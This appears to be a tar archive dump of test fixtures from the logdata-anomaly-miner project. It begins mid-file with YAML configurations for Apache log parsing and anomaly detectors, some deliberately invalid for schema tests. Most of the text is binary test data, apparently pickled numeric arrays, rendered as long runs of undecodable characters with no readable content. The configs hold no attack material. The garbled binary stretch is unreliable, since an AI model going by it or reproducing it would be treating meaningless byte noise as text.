'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'START' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: EventTypeDetector id: EventTypeDetector min_num_vals: 100 max_num_vals: 99 learn_mode: False logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/bigger_than_or_equal_valid.yml000066400000000000000000000013301437606560100332240ustar00rootroot00000000000000LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'START' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: EventTypeDetector id: EventTypeDetector1 min_num_vals: 100 max_num_vals: 200 learn_mode: False - type: EventTypeDetector id: EventTypeDetector2 min_num_vals: 100 max_num_vals: 100 learn_mode: False logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/double_parserstart_config.yml000066400000000000000000000026001437606560100331370ustar00rootroot00000000000000AminerUser: 'aminer' AminerGroup: 'aminer' LogResourceList: - 'file:///var/log/apache2/access.log' Core.PersistenceDir: '/tmp/lib/aminer' Parser: - id: 'apacheModel' start: True type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'firstModel' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: False learn_mode: True - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' # optional default: Default output_logline: False allow_missing_values: False # optional default: False - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: True EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler - id: syslog type: SyslogWriterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/filter_config_errors.yml000066400000000000000000000027241437606560100321230ustar00rootroot00000000000000AminerUser: 'aminer' AMinerGroup: 'aminer' # this attribute does not exist LogResourceList: - 'file:///var/log/apache2/access.log' RemoteControlSocket: '/var/run/aminer-remote.socket' Core.PersistenceDir: '/tmp/lib/aminer' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' args2: 'apache2' # this attribute does not exist - id: 'START' start: True type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False timestamp_paths: "/model/accesslog/time" Analysis: - type: ParserCount id: ParserCount paths: ["/model/accesslog/status"] report_interval: 10 reset_after_report_flag: False # this attribute does not exist learn_mode: True # this attribute does not exist - type: NewMatchPathValueComboDetector id: NewMatchPathValueComboDetector1 paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' output_logline: False allow_missing_values: False EventHandlers: - id: stpe type: StreamPrinterEventHandler output_file_path: '/tmp/streamPrinter.txt' - id: syslog type: SyslogWriterEventHandler output_file_path: '/tmp/streamPrinter.txt' # this attribute does not exist logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/invalid_config.yml000066400000000000000000000034061437606560100306660ustar00rootroot00000000000000"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/invalid_schema.yml000066400000000000000000000026711437606560100306640ustar00rootroot00000000000000# This schema is invalid, because of the Some_Weird_Option key. Some_Weird_Option: "test" AminerUser: 'aminer' # optional default: aminer AminerGroup: 'aminer' # optional default: aminer LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'START' type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: False learn_mode: True - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' # optional default: Default output_logline: False allow_missing_values: False # optional default: False - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: True EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler - id: syslog type: SyslogWriterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/json_config.yml000066400000000000000000000011771437606560100302140ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - host_name_model Input: timestamp_paths: "/accesslog/time" EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandlerlogdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/learnMode_config.yml000066400000000000000000000016741437606560100311530ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - host_name_model Input: timestamp_paths: "/accesslog/time" Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValueDetector paths: ["/accesslog/status"] learn_mode: True - type: NewMatchPathValueComboDetector id: NewMatchPathValueComboDetector paths: ["/accesslog/method","/accesslog/request","/accesslog/useragent"] learn_mode: False EventHandlers: - id: stpe type: StreamPrinterEventHandlerlogdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/main.yml000066400000000000000000000012451437606560100266360ustar00rootroot00000000000000LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 'sub1' type: Sub1 name: 'sub1' - id: 'sub2' type: Sub2 name: 'sub2' - id: 'sub3' type: Sub3 name: 'sub3' - id: 'apacheModel' type: ApacheAccessModel name: 'apache' - id: 'START' start: True type: FirstMatchModelElement name: 'model' args: - sub1 - sub2 - sub3 - apacheModel Input: timestamp_paths: [""] EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/missing_parserstart_config.yml000066400000000000000000000026121437606560100333410ustar00rootroot00000000000000AminerUser: 'aminer' # optional default: aminer AminerGroup: 'aminer' # optional default: aminer LogResourceList: - 'file:///var/log/apache2/access.log' Core.PersistenceDir: '/tmp/lib/aminer' Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'firstModel' type: SequenceModelElement name: 'model' args: apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: False learn_mode: True - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: True persistence_id: 'accesslog_request' # optional default: Default output_logline: False allow_missing_values: False # optional default: False - type: NewMatchPathValueComboDetector paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: True EventHandlers: - id: stpe json: True # optional default: False type: StreamPrinterEventHandler - id: syslog type: SyslogWriterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/multiSource_config.yml000066400000000000000000000017511437606560100315540ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: 'startModel' start: True type: SequenceModelElement name: 'accesslog' args: - host_name_model Input: multi_source: True # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: NewMatchPathValueDetector id: NewMatchPathValueDetector paths: ["/accesslog/status"] learn_mode: True - type: NewMatchPathValueComboDetector id: NewMatchPathValueComboDetector paths: ["/accesslog/method","/accesslog/request","/accesslog/useragent"] learn_mode: False EventHandlers: - id: stpe type: StreamPrinterEventHandlerlogdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/multiple_components.yml000066400000000000000000000173201437606560100320130ustar00rootroot00000000000000LearnMode: True # optional Core.PersistenceDir: '/var/tmp/test2/aminer' LogResourceList: - 'file:///var/tmp/test2/log/access.log' Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: identity_model type: VariableByteDataModelElement name: 'ident' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: user_name_model type: VariableByteDataModelElement name: 'user' args: '0123456789abcdefghijklmnopqrstuvwxyz.-' - id: new_time_model type: DateTimeModelElement name: 'time' date_format: '[%d/%b/%Y:%H:%M:%S +0000]' - id: sq3 type: FixedDataModelElement name: 'sq3' args: ' "' - id: request_method_model type: FixedWordlistDataModelElement name: 'method' args: - 'GET' - 'POST' - 'PUT' - 'HEAD' - 'DELETE' - 'CONNECT' - 'OPTIONS' - 'TRACE' - 'PATCH' - id: request_model type: VariableByteDataModelElement name: 'request' args: '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-/()[]{}!$%&=G?LGP+tG?+%G?FWfG?!zm>G?Y0G?.ɨG?e$"G?fٶ#G?n\G?L]G?b~G?jV=G?OmEG?:0 G?煃؃G?F8G?v3$G?^5ȃG?< G?(G?G?}}dG?+NT:G?̿FiG? j*G?-O(G?T-G?k.AG?sp G?X(G?)8n8lG?G?"۝,G?V幒G?}*,Ƹ-G?{: G?&$G?TG?K$$d%G?SquG?U0 G?mP#"G?؁>/G?}?uG?ӜSG?eu2G?6t[G?fAG?ĜHG?G?(~zeG?ap'G?ӕpG?^4G?SG?:2x*G?ӮL G?쎐"G?]kG?7RG? G?xG? "`}G?럖?OG?LDMG?(WG?MfG?>-HVG?G?ٶR.<=G?>|MG?ﲜ'G?/MԻG?XRkG?!١rG?azvG?_q G?IxG?@rCG?[ogG??.PG?esdXG?G?ʇՏCUG?š,yG?^!9G?w#r G?"2G?҂s'IG?"qG?r?G?XAG?vEG?D dG?cVVG?#qG?4VG?~cG?cATG?P)+G?k"UG?m~U<0G?UBG?jGM G?zD7G?E( BG?G(LG?_٧G?@ZG?ÊD@nG?}UH'G?K 4ӏG?a}~|G?Ҭp%^G?cj<LJG?FG?س+]fG?YQPG?:G? 3G?= 6@G?LG?Lo`aG?VהG?(KG?_:x晴G?ָ*_ G?^ɮzCG?*sG?B~G? LAG?~>yG?ÍyyG?vHSS^G?vt1G?R3G?AkW~G?%G?˾+' %?G?4G?)WzG?[sdG?oxQ"G?Y,G?7xW G?!B3]G?9rbvG?9,G?ʧG?޻ZFG?,Q*G?noG?^ 9w$G?TVG?^^G?t/M0MdG?KQꟊG?Ϻ;0 G?y5FG?Ɣ1"!G?G?ksG?ꆺG?Q5!G?ׇY CG?pUG?29{'>G?2i G? .c[RG?x0G%G?ڈ&ICG?#G?=fsjG?\z)G?ê.G?]￵vG?./xG?_G?pHG?G?f|G?G?cwG?ꎟr)BG?MdG?{LUrG?ѧ G?C"G?"4nG?VdG?Ú YG?S;P(G?⤬G?WVQG?1%IG?4j{G?a+/G?[=G?QGG?+ 6G?J%G?U.M7G?y'KG?˼n TG?ܓG?.G?Ñ~NG?; VG?᮵߹G?o4G>`qG?'՝wG?*EG?emItG?SG?-YG?JG?=5eG?nY-IG?LMG?Mb@ȍG?tG?msG?2G?ٽYNG?mFO9G?@ ޱG?ЭG?5G?5p\G?̔G?L2G?d0N\G?s ӳG?#ʑG?rsG?ɛ뾊?G?z)G?dQG?ȄgG?=H 5G?ESЄG?CsG?fdaG?׊MʥG?ڱ“G?S;G?׸FG?J~*. G?]ċ"G?ųB}TG?ͪ+XG?EhwG?哇+Y#G?X.kGG?{1G?놊HWG?-ۃG?+-aWG?2NgG?R~e G?>RzG?{G?ØlKqG?EG?PөsG?ИG?젱XˠG?йqkG?:pArG?%yG? &G?ٷ%Lm G?dX JzG?y:SG?qi)G?V`02G?0lG?N-JG?„}&G?q&G?ځ9θG?H2 G??]G?<6 23G?1ݬ:G??>lG?眻wG?z>ˠ(G?μG?ӊG? pY zG?bԂG?T6cenG?zJG?0nwG?gdCG?1ʟ"G?W[]ǠG?FG?Եr8).G?24G?cjG?\rLM!G?`lXG?KƜG?c!BG?{EG?-<%ZG?YuiG?G?Qǣ|G?}RG[G?EoTsG?KH"G?`G?AX:G?x}>G?G?ǻyQG?DAhG?P]BCG?6G?G?0G?qbsyG?%G?ڮG?L_(SG?N>G?ӘG?rg1dG?䐅G?JG?u$k(G?.G?= -qG?pj{^G?ոxG?DTG?2fTG? zOG?Mش@G?獧W'G?ﺟH0dG?~.wxG?ߧ](G? G?˶G?bG?LEG?_RsG?йdՉ+G?J:v7G?ÐG?` ҃G?U?G?G?fgnG?G?I4[G?n0G?9p?G?&KG?ASG?VL0_LG?E=G?yn G? hG?K G?ҶFEG?N6G?㑀ۅG?NG2G?M#{G?bȻ$G?ѓԮ G?'Q?G?:jdG?fH#CUG?TҥRG?!@vG?#wG?SSdG?f G?JG?`܄G?Op2ZQG?EbK G?G?V=G?0C{G?uON-G?ӈY9G?P?#G? O_asG?bG?9pG?!rjrG?`2G?; (G?8>A]G?eفG?ƫص|G?VcxG?MG?U3=G?ݜ[G?jG?`,G?RnG? [G?K/G?z A\G?QG?)}G?`:G?ͶeLG?!G?xXD\G?S^tG?;G3`G?d%;ZG?SMG?NrG?v4@G? G?p&G?1_G?+[uG?b,G?tZOG?FG?lʗG?"cjG?g8暥G?=d3G?p֌G?EUG?䇂G?ݬG?精T>c*G?h@9G?#ɑG?ہwG?~,Qt5G?-yAG?,e8|uG?=fNG?:G?*G?-&G?huq@G?rG?fG?6O7G?ptG?tlsG?`@Ye~G?:`G?z)LG?SG?_=G?fV G?X~9 G?fTK?G?D/pG?#$G?v} G?'j:(G?U\NG?jCyG?-5G?N.nG?5G?^m%нG>m*FG?l(pG?%G?c'G?DTbG?XG?-rcG?B2xTG?9NG?d7:G?TCG?M nG?0BlG? G?7'Oe(G?%@́G?}\" G?+eG?4w7]qG?G?.mG?QݡG?cG?,0G?ԝRG?邩WꅑG?zYmG?U?B;rG?&K7G?VY.*G?[?}G?#ayG?ΆЧU:G?$nG?fx/G?="G??w!G?0rw.=G?'G?G?1dG?Ǘ^VG?\!G.G?b=&G?*EG?B"TG?.8%G?xsG? m G?+*oG?}~QG?":+G?Te/G?*>3u_G?cl4G?'G?u G?$ G? x?G? 3G?&K>G?C 湫G?Z_G?㟭Ĉ)G?eÚGG?˚QG? G?!#ЁG?WIG?XɽإG?ǁ}G?ﵭG?/G?侕K G?lqG?xBG?G?{ G?i)<G?ږo9G?{ G? lG?ݩ8xI4G?NcVۭG?݅3AhG?LlG?tG?Q𐆚 G?.wl0G?|%.G?&A+G?_: G?F]0G?[!G?;~^9G?kOG?'7j0G?F;ZG?ޓ鞋G?ֻ*W G?)M RG?喜l)G?׆ 7ZG?ymG?YG??ՃG?G//jG?ÊWg+G?߹&G?>~CG?-IIG?{paG?ZGH(G?G?꺜(G?nG?'oG?\{&G?ᄼGeG?ѱJ(9cG?KBsG>؉1G?r!G?<G?M/gG>⳥r\G?\rG?M|G?iT8G?uz]G?咜cG?TW*OG?96G?!+G?6xEG?-VG?X]`G?[S&G? ,G?a:G?െ"G?]OG?8ԟG?mnG?V y 4G?ᄾLׯ-G? G?ؤە{G?r; G?Rk;j7G?A 0G?#9AG??FFG?ʔ!B7 @G? cNVG?H._G?k* XEG?7-iG?h3EiRG?]XG? GG?[G?W?G?T G?1ԅPG?҄G?L냌G?}ۥ,G? >G?\CG?~öG?}XG?阘OG?:G?om 8G?:MOG?"EVG?'G?;XG?$@XG?$UG?j]G?x0µG?9WlG?iN$G?2(G?.|G?|~3G?ˈYqKG?rt٪G?ӽpQyG?›'7G?;G?G?(G??G?ޘ*G?˘O~!&G?ԝVG?.ka6G?5{@G?fxG?͔ouG?݉v)G?ҹ'!G?lSFN G?'5G?RDG?G?qDnJG?}G?ݓoG?r'ퟺG?ةԱG?VmF@G?Dyv-RAG? G?bIJG?EG?3G?{B/ӔG?ܦQ^G?M*ږ\G?V8G?:ɕ\ G?h`a4G?2DQ,G?IUaNYG?}TG?4AYG?|_nG?` G?0CvG?TG?ڑ~G?G? ꅮXUG?ӕ@tB$G?Z BG?|mKvG?tJ G?W;G?Reґ:G?Kף)%G?Sb\tG?Q6ޞ8G?a@/G?eG?!+G?^6)G?Qu$iG?Tx G?T5\G? y)G?~/G?mL`dG?vG?[ 舦8G?SBMXG?db|G?L VIG?cߟG?=_G?1SG?penG?ٗ wG?v1G?G?AG?t |ӓG?kSG?.j\JG?@*G?iฤ"G?hv4G?pG?.EBG?0`B}G?D~(G?vG? ŧ@G?wȽG?RTgG?cDQG?YV G?X)G?wn^4=G?±naeG?S zG?㎏CQG?ٸG?)~،G?{[G?G??ۙG?Sd7G?֌[G?桖zcG?р*ڢDG?fG?,ᕀG?klG?>GC}G?NBDG?AC 8G?‹92G?M G?~~mbKG? gG?G?VgL~G?U RG?G?G?D^4ٷ4G?ذڄG?~S2¡G?u]G?­G?`':G?kΆ{G?Ei.G?˦WnN"G?dG?̷)z3G?.N*fG?U5ܾG?]KG?/No/G?:lG?lAȫG?CVG?a]G?\!G?+6oG?\~޾SG?OXG?|1gG?av G?]G?›G? dG?G?Nx3!G?UKIG?UO G?ӂhV:G?6 {G?YLTG?sG?إ_!G?( ڼG?@O2G?aLG?y,bG?7G?hG?qQC5G?5G?]_-*G?_5G?NLlrG?B&G?ϙGG?WշwG?1~G?#3]G?&7Vc~G?pcҲG?-6VifG?͢G?}jp6G?̚>'G?bjzG?뒳G?Gj^G?߀G?уG?⫻)G?斄['G?.G?\m 0G?pñiG?pydG?ҪG?O{G?ȱBIG?*G?˅ѐG?vzG?ꠏXG?_G?c;)"YG? łvG?o+[b(G? ?G?p:9G?%U֨G?ܯ>G? UG?G G+1G?0fG?+LkG?Y@HqG? ^jG?쾠 LG?`@G?AG?Tn G?)(G?Ʋ5M`G? ^T G? MEG?oW/:G?eSG?2tKΓG?ҨhG?+pw1G?2s iG? G?ɟZEG?txJ\`G?8,@G?1G?$vG?t}"G?ъXE+G?=Ǥ G?q3vG?$J:G?޶kG?UG?古eG? 1OS@G?G?~2 oG?h+G?yG?]G?G?ŜMG?b3G?Miӧ0YG?GU\G?ݶLVG?a|YG?yHG?Ј( $G?U G?orjG?b>6UG?fFZG?o\ԓG?^ kG?k"G?=L"߻G?=MG?Ϙ<]G?a7G?EoG?k5G?: G?_B:`G?(A G?x>^}G?}G?nnG?CG?~G?ҧJjsG?]6G?=GG?{t2rG?B7 WG?M/ZbuG?\tG?G? G?3QׯȮG?cFG?ȡzG?-,YG?T)nG?CdRrG?UG?N+G?|2.^ G??G?LhG?ԐӦ G?.xG?+uiG?k7G?ˬ?nDG?#G?[_)>G?i&G?>Dd:G?(W&G?{O X۹G?ﹰ!?{G?0(\G?n,[icG?y )=G?М@l|G?f#:z+G?3%{aG?HIZ.G?}8 G?v*nG?lyfaG? e@G?a"G?z(NG?,O)G?ڂ9<G?8kVG?:j⃕G?SfpYG?֤F1G?.UUG?O7~G?x? G?/=NQG?B_G?4}mG?PWG?쭴/G?"ti^G?CwG?aK~G?aG?(H"zEG? ޶G?(ZG?NJG?CQG?і\.G?)-ZG?'ZnPG? J?G?!٦G?136fG?T4?G?_9G?hM3G?~,XG?^ݹG?>0G?XӟR#G?[G?Ri8G?0IG?ԃG?)G?R2G?¤_%G?؊pbG?p?DmG?, xG?&'sG?:!G?G?G?yG?ԽnGG?W G?0p-G?,D0G?}G?*RGG?C%jnNG?ߞ{nuG?S̉iUnG?q7G?bHG?ď&G?MG?M3G?GG?p{bzG?"6G?(tG?fG?ںw Y$hG?I9G?Z5G?G?h#evG?Ug*UG?薈1s=G?EMG?m}G?ǣYfG?G?ρH~zQG?쓔v9G?G?uɝRG? 2)G?#rੈwG? ؾ=G?' cZG?PG?́:QNG?}\G?q7fG?r`+G?G?I%G?,81G?Rx}~(G?<G?h_`G?")JG?aBG?%&eEG?նZ6G?c+4}G?Ib7G?󺰇G?1 bG?2G?$z-*G?SE G?Q˭G?3yG?][FG?*5LG?Ӱ6i5VG?ysG?DG?؁w,qG?ݻԝ|NG?F:G? ȕG?yJn_G?WG?꿣T|G?qc?G?;iq/G?G?ͤ,bG?b _G?sꇨG?ꡍqG?ARG?&wG?nQ`G?ȤHG?Խ&EG?G? 6zSG?ݛ}7?Rhh Cj?Rhh C?Rhh Co;?Rhh C(9J?Rhh C[Zn?Rhh Cr*=2A_`?Rhh C\4?Rhh Cמ*?Rhh C t?Rhh C(?Rhh C;Jz+ ?Rhh CW4~?Rhh Cb1?Rhh CP9?Rhh C/ K?Rhh CDDd?Rhh CXx?Rhh C&A>Z0o?Rhh C;%?Rhh C _?Rhh C :}?Rhh CS{?Rhh CBn?Rhh C.?Rhh CfR?Rhh CJ?Rhh C^d?Rhh Ci[?Rhh C4'8?Rhh Cmj1?Rhh Cd0XQg?Rhh C ܍8?Rhh Cc?Rhh Cma?Rhh C2!}?Rhh CcS?Rhh C ~N?Rhh Cn%p?Rhh C5,a?Rhh Cl >e?Rhh C0_~?Rhh C?$uE0?Rhh C!?Rhh CEFV?Rhh Cq_=H?Rhh CY:~e?Rhh C&F{1?Rhh C3?Rhh Cߏ1RI?Rhh C&DB?Rhh C+n{?Rhh C|2?Rhh Cm%?Rhh C>վ1?Rhh Ce.?Rhh CHf?Rhh Cc㌙?Rhh Cxɖ?Rhh C4b?Rhh CDn j+?Rhh CQTU?Rhh C~s#?Rhh CAcj+?Rhh CZ􁯄?Rhh C++0?Rhh C(aX?Rhh CvŮV8?Rhh C ,5?Rhh Cш?Re.logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/vtd_data/beta1_data_test7000066400000000000000000000647021437606560100275320ustar00rootroot00000000000000i](](G?ӘXKG?|G?wG?jW G?z|yG>G?yG?8hn\G?^ְ̉KG? 깸G?M G?vGDG?\vQG?_eHyG?ɥ,G?@G?N-pG?wgCG?k:G?.aG?t tG?+)NG?ڙhG?ݍa5G?t0OG?>/kUG?Æ3G?s_G?AcG?Җ rG?ոb1G?T]/hjG?Ɉ+G?ۄ0K r!G?̦7sEG?N'NG?VvmG?A[wnDG?QF6|G?eoG?ulf%G?G?*jOG?\NZ9G?NG?rxG?f?GG?0F}DG?bG?ZOG?]tDsG? )dG?>BG?4vG?ߣ-G?~݅G?oD]+%G?3GaqG?BˮxG?jRG?oG?1>j`G?C=LG?!G?hJ -G?|G?} ӥG?G?RG?*G]SG?Ң$G?3G?{Yr>&G?!OG?wKԢG?@aG?}sG?ŇZG?ݿ0G?8x G?(x+G?G?7mG?؏G?v~G?O;΂G?;H-G?U7U=G?_[&G?'GG?c@IG?`5GG?^CGOG? HOWG?rjG?T\G?d1dG?g1zFG?I"(H8G? &G?!}-G?ٙZ1\G?q G?PZG?wGCG?+>lG?M>G?eIBG?Jsc-G?!G?nuG?j?H:WG?w'=G?/G?4m;G?aCލsG?ՐxG?\) W G?1\:1rG?*$IG?2zTaG?hn"G>6DuKrG?ދÉG?.>TG?D)7zG?oG?/w`G?nG?a]WG?d72G?ܳѿkG?1n)G?;(rG?[.Ŋ1G?(`XG?אG?(^G?NF#PG?>ISG? d_G?RgLG?P`yG?9"G?K']FG?G?G?~MG?эG?#t0G?èbG?<+/G?=f0G?G?4ks7 wG?̅ G?3WG?wɀG?%Q{G?\&G?O9:nG?9;D'm)G?ƻκZ=4G?ޅhSG?hG?!/bG?Z{vG?lG?GBnLMG?+WJG?}uTG?oCC.G?S_/G?&UPhG?mCKG?9/'G?\xRG?`G?۫G?΁ԏG?1lG?R(0LG?G?%G?r\\1G?vە+G?_)+cG?k)%dG?4ڌIG? ?G?6)~G?2CG?fp,G?&WG?u-تG?& #g:G?h]k_G?r+6oG?S$zG?8B3.G?*G?JkG?H^}75G?tVJ y3|G?-0^!G?ҕAG?(BG?*o^G?ǵDG?vTLG?$G?'G?33G?-dG?#ING?{xG??$kwG?_[A$G?+YJG?_ G?~G?̕{U&G?&D8G? 5~)kG?Vc+G?ՅrG? G?ܦ=G?͒Ɨ8G?κ-G?̖ G?nPAG?xa.)G?5)6G?3HG?t^kG?qJkG?BtgG?Ƙ G?w>]G?/#"G?w-5 G?#gOG?e=YdG?ň*j|G?̣G?O#jG?H=G?yG?/G?hG?HUjG?0;G?5G?6i>G?pFG?5f G? .qG?iG?fmG?YG?7EG?.cG?1]-uG?CWPG?J3jG?DOG?J-xG?eٝG?46G? ;~wG?@JG?G)!6G?uP踋G?x=:bG?b#G?`NRG?rG?XhsLG?E5G?ų0G?țG?ɒrG?@{"!G?ӑ;G?"G?wG??U?&=G?wG? )OG?0@G?Һ9L :G?nyG?-`BG?=#T*G?dG?n1mG?ڶ'G?-Q`G?7HuG?"G?񳌉;G?iG?#qG?ɞvG?읳{^G?n`UG?K G?1FG?yG?+5G?HOmG?WRٛ:G?FeG?\QG?e: G?V EG?.[y$G?ESG?M=:G?-j G?ߥj`G? (4G?͢89q'G?bG?Ʒ5pG? O0G?G?nzG?eG?=-G?l1G?ֳ"leG? =\QG?ϙtG?UWDG?; jG?єH>,G?o̵G?c IaG?}vG>QoٹG??ݱG?ul_G?#gG?ta՛G?sfG?JZG?fatԞG?uCsl֤G?Ѣ5 G?JJG?kġk%qG? @G?D}q:G?B/G?ֹG?JJG?F;UfG?ק8G?]G XwG?ˎKG?q G?mG?\wL8G?' mI-G?EG?uNG?;NӸG?YG?T {hG?zFqG?MG?ҝ&U]G?ze`aG?G?N4XgG?wG?ǐG?DG?³G?QJvS2G?۟*G?G G?u=L(G?5{G?Akm`fG?BÕ;IG?&nG?OwWqG?^/ G?~ *{7G?{G?O5G?Q˱.RG?߰BMG?/OsG?z>hG?xЦG?eG?7vG?L G?@ZG?xx)G?Yb&MG? ,NG?jWG?g#kRG?ΌswG?G?X:tG?++#G?[/DG?djG?tG?§ŏG?[ G?6.^^G?;G?ýUQ,G?呾G? `?5G?G?G?ݨFo.sG?XFG?3:G?Bjkv;G?(F:G?_ٗcکG?ԫނVG?=K{yG?Eikd G?IG?,kG?22'WVG?(iG?P[Z\G?VjsG?P"G?Øhl G?ʸbbG?:CG?%֌G?|):G?0G?΄ҋ~G?sAiG?X@JG?A=^KjcG?ʓ]lG?X<"G?p)FG?/qopG?!tYG?^wqG?I׍ƇG?J G?a:FG?b G?`>G?\JG?ɣ%ڠG?Ӆ04zG?ϗy“G?SV&G?,ҚG?K+G?6R G?nG?6NG?ﭏgG?M|0NG?S++G?41eG?htnHG?u` G?5sG?[~u G?#dŘG?FvG?a+ NG?G?+M%cG?#G?97vG?=[ \G?!G?a,G?:oZG?4dտG? ?;0p;G?du`G?\D}G?/1KG?v5G?;*{G?ՔᆉG?3hmG?FLG?4fEG?<_}G?kG?ٙG?Vg)G?k&77G?^B*G?%^G?ٖw%G?s'9(G?@G?i25G?탱qZG?nGk rG?G?G?礶^y~G?#̺G?䝺rG?j G?BYUG?}{G?y1-G?~ۋ G?2#G?bBG?AzG?v pG?*G?ƌjȉ:G?ӳ\G?ƥ,G?XaG?X XG?߻G?۔" G?>;G?仴K~$G?ٍ0VqG?e:LG?G?ﻻG?H7aeG?KTG?Pj/G?쪎G??G?sm+G?GG>w5G?$S/^G?SGG?ZG?J G?ZIG?)cG?5!MG?ƌG?LCHG?vG?^R:G?YMG?o瀾G?鶞^hVG? ~G?ً G?*V|G?΀G?],UG?j!UzG? ]G?2bśG?G?bיG?*~fG?*G?/ _G?{IG?qڙgG?H\դG?;{QDG?i1XG?7 [G?^G?,߫G?S˅G?RRyG?R@BG?lGЉG?ȧ(G?3a>G?؇wƕG?'$_G?G?G?1{ 2G?V_G?RBG?epG?1>s*G>˗8 8G?-zG? 2G?<1]:G?a 